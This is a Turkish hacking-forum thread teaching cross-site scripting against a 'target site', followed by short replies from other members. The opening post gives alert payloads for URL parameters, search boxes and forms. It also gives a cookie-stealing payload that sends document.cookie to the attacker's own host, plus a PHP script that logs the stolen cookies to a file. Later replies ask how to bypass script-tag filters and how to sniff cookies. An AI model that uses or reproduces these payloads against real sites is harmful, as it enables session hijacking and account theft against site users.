İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Xss Geniş Anlatım!

03-04-2017 23:29
#1
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.275
Teşekkür (Etti):
512
Teşekkür (Aldı):
1273
Konular:
314
Ticaret:
(0) %
Saldırı Türleri
1)Reflected Xss Saldırsı
Sitede girilmesi beklenen parametre girişine Javascript kodları girerek bunu ekrana yansıtmasıyla belirlenen
Xss çeşididir.


2)Stored Xss Saldırısı
Reflected Xss'den farklı olarak gönderilen kodlar bir veritabanına kaydedilir ve siteye giren tüm kullanıcılar bunu görebilir.

3)Dom Xss Saldırısı
Dom Xss en tehlikeli Xss türüdür. Dom nesneleri ile hedef sitenin index'i ve sayfanın kodları değiştirilebilir.


Saldırı Türlerini Nerede Uygulayacağız?
1) id= Değerinden Sonra
Hedef sitemizi düşünelim.
Bizim xss kodlarımızı kullanacağımız herler get ve post methodlarının olduğu yerlerdir.
Şimdi deneyelim.
Bu sitede faq.php bölümünün id=1 değrinde kodumuzu çalıştıracağız.
Tüm kodları bir sonraki postta vereceğim. Şimdiki kodumuz:
Kod:
><s cript>alert("xss")</script>
Bu kodumuz ile sitede Xss hatası varsa ekrana uyarı alacağız.
Kod:
www.hedefsite.com/faq.php?id=><s cript>alert(MyGf)</script>
Eğer Xss var ise ekrana MyGf yazılı bir alert verecektir. Bunu sadece faq.php'de değil tüm .php dosyalarında uygulayabilirsini.

2) Arama Kutucuğu
Sitenin herhangibir yerinde arama kutucuğu var ise
yine bu kutucuğa Xss kodumuzu yazıp ara dediğimizde
alert veriyor ise sitede Xss vardır.


3)Formlar
Burada yine 2. seçenek ile aynı olarak kutucuğa Xss kodumuzu yazıyoruz fakat bunu formlarda yaptığımızda yani formun herhangibir yerine
Kod:
><s cript>alert(MyGf)</script>
Lyazdığımızda ve gönder dediğimizde gönderdiğimiz form veritabanına kayıt edildiği için kodumuz da kaydedilir ve çok tehlikelidir. Başka kullanıcılar tarafından da görülebilinir.


Cookie Çalma
Kod:
<S CRIPT>l ocation.href='http://www.siteniz.com/cookie.php?cookie='+escape(d ocument.cookie)</SCRIPT>
Yukarıdaki Xss kodu ile sitedeki cookielere çekebilir ve kendi sitenizdeki cookie.php'ye kaydedebilirsiniz. Bunun için sitenizin cookie.php kodları:
Kod:
 <?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
şeklinde olmalıdır.


Konumu Ziyaret Ettiğiniz İçin Teşekkürler. İyi Forumlar.
Konu MyGf tarafından (04-04-2017 00:00 Saat 00:00 ) değiştirilmiştir.
NoStopBoys, DefacerTaki Teşekkür etti.

03-04-2017 23:34
#2
NoStopBoys - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
2.141
Teşekkür (Etti):
903
Teşekkür (Aldı):
721
Konular:
82
Ticaret:
(0) %
ellerine sağlık dostum
Kullanıcı İmzası
Bu Dünyadaki En Erdemli Hareket Sadakattir.
03-04-2017 23:38
#3
Arch1O - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2009
Nereden:
127.0.0.1
Mesajlar:
30
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
0
Ticaret:
(0) %
Üstadım <script> tagı site tarafından engellenmişse nasıl bir yol izlenmesi gerekiyor ? Xss üzerinden sniffer kullanılarak çerezlerin çekiminide anlatsaydınız keşke :/
03-04-2017 23:39
#4
osm4nl1evl4d1 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
03/2017
Nereden:
T Ü R K
Mesajlar:
4.256
Teşekkür (Etti):
791
Teşekkür (Aldı):
1005
Konular:
194
Ticaret:
(0) %
Fazl genis olmamis ama.eline saglik
03-04-2017 23:40
#5
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.275
Teşekkür (Etti):
512
Teşekkür (Aldı):
1273
Konular:
314
Ticaret:
(0) %
Alıntı:
Arch1O´isimli üyeden Alıntı Mesajı göster
Üstadım <script> tagı site tarafından engellenmişse nasıl bir yol izlenmesi gerekiyor ? Xss üzerinden sniffer kullanılarak çerezlerin çekiminide anlatsaydınız keşke :/
Sürekli güncellemeye çalışacağım dostum. Saol tavsiyen için.
03-04-2017 23:40
#6
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.275
Teşekkür (Etti):
512
Teşekkür (Aldı):
1273
Konular:
314
Ticaret:
(0) %
Alıntı:
NoStopBoys´isimli üyeden Alıntı Mesajı göster
ellerine sağlık dostum
Sağ olun hocam.
03-04-2017 23:42
#7
Arch1O - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2009
Nereden:
127.0.0.1
Mesajlar:
30
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
0
Ticaret:
(0) %
Alıntı:
MyGf´isimli üyeden Alıntı Mesajı göster
Sürekli güncellemeye çalışacağım dostum. Saol tavsiyen için.
Karakter sınırlaması gibi basit engellerin baypas edilmesi. Xss için kullanılan çeşitli eklenti ve toollar hakkında bilgide verirseniz sevinirim :/ Cahil birisiyim bu konuları öğrenmek istiyorum
03-04-2017 23:48
#8
hackmione - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
61
Teşekkür (Etti):
13
Teşekkür (Aldı):
4
Konular:
0
Ticaret:
(0) %
Hala bir çok sitede var olan bir açık.Dom xss hakkında daha çok bilgi almak isterim..Emeğinize sağlık.
03-04-2017 23:58
#9
Arch1O - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2009
Nereden:
127.0.0.1
Mesajlar:
30
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
0
Ticaret:
(0) %
Alıntı:
hackmione´isimli üyeden Alıntı Mesajı göster
Hala bir çok sitede var olan bir açık.Dom xss hakkında daha çok bilgi almak isterim..Emeğinize sağlık.
Evet xss büyük sitelerde bile çok sayıda bulunan ve bu işten güzel paralar kazanılabilecek bir açık.
Bu gün twitter tarafından bir ödül avcısına verilen ufak bir miktar.

04-04-2017 00:01
#10
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.275
Teşekkür (Etti):
512
Teşekkür (Aldı):
1273
Konular:
314
Ticaret:
(0) %
Alıntı:
Arch1O´isimli üyeden Alıntı Mesajı göster
Üstadım <script> tagı site tarafından engellenmişse nasıl bir yol izlenmesi gerekiyor ? Xss üzerinden sniffer kullanılarak çerezlerin çekiminide anlatsaydınız keşke :/
Cookielerin çekilmesi eklenmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı